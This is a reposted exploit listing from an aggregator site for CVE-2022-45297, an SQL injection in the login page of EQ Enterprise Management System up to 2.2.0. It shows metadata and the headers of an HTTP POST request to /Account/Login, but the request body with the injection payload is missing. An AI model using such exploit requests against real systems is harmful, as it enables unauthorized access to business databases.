EQ Enterprise Management System 2.2.0 SQL Injection

CVE Category Price Severity
CVE-2022-45297 CWE-89 Unknown High
Author Risk Exploitation Type Date
Unknown High Remote 2023-04-02
Our sensors found this exploit at:

Below is a copy:

EQ Enterprise Management System 2.2.0 SQL Injection
Exploit Title: EQ Enterprise management system v2.2.0 - SQL Injection
Date: 2022.12.7
Exploit Author: TLF
Vendor Homepage:
Software Link():,,,,
Version: EQ v1.5.31 to v2.2.0
Tested on: windows 10
CVE : CVE-2022-45297 

POST /Account/Login HTTP/1.1 
User-Agent:Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0
Content-Length: 118 
Accept: application/json, text/javascript, */*; q=0.01 
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: application/x-www-form-urlencoded; 
charset=UTF-8 Cookie: ASP.NET_SessionId=tlipmh0zjgfdm5b4h1tgvolg 
X-Requested-With: XMLHttpRequest 
Accept-Encoding: gzip

Copyright ©2024 Exploitalert.

All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use.